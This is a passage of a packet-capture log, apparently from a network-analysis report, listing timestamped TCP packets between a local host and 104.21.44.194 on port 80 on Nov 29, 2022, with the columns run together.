                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616208076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616216898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616216898 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616220951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616233110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616245985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616257906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616270065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616281986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616295099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616316080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616342068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616353035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616364002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616367102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616367102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616367102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616368055 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616374969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616381884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616385937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616396904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616408110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616416931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616416931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616585970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616585970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616586924 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.624561071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624754906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.624834061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624847889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624891996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624910116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624924898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624949932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624979019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.624990940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625015974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625040054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625051975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625062943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625077963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.625077963 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.675694942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675710917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675729036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675743103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675760031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675776958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675795078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675807953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675820112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675837994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675851107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675868988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675877094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.675889015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675904036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675920963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675936937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675954103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675967932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.675985098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676002026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676016092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676032066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676049948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676070929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676085949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676100969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676115990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676129103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676141024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676153898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676171064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676186085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676198959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676211119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676229000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676248074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676265001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676278114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676290035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676301003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676323891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676337004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676348925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676362038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676373959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676388025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676388025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676388025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676404953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676418066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676429987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676443100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676455021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676466942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676480055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676491976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676505089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676517010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676527977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676539898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676556110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676573038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676584959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676595926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676608086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676619053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676630020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676641941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676652908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676664114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676676035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676687002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676697969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676709890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676724911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676743031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676762104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676776886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676788092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676800013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676810980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676822901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676834106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676845074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676855087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676866055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676877975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676886082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676886082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676896095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676909924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676920891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676932096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676944017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676954985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676965952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676978111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676989079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677000046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677011967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677022934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677033901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677046061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677057981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677061081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677078962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677092075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677103043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677114010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677125931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677136898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677149057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677160025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677170992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677181959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677194118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677205086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677216053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677233934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677247047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685390949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685523033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685542107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685558081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685569048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685579062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685590029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685604095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685615063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685625076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685636044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685647011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685657978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685667992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685678959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685889006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685914040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685931921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685946941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685971022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685996056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686007977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686019897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686031103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686043024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686053991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686064005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686074972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720046043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720082045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720122099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720149040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720180035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720184088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720211029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720230103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720248938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720280886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720299959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720345020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720371008 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720387936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720411062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720432997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720453978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720474005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720494032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720513105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720532894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720544100 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720544100 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720544100 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720545053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720545053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720545053 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720556021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720576048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720597982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720622063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720642090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720659971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720679045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720694065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720705032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720716000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720726967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720750093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720751047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720762014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720773935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720784903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720794916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720805883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720817089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.720900059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720900059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.720900059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.721098900 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.732968092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733071089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733083010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733093977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733113050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733124018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733175993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733184099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733252048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733263969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733274937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733293056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733304024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733320951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733351946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733361006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733382940 CET8049852104.21.44.194192.168.11.20
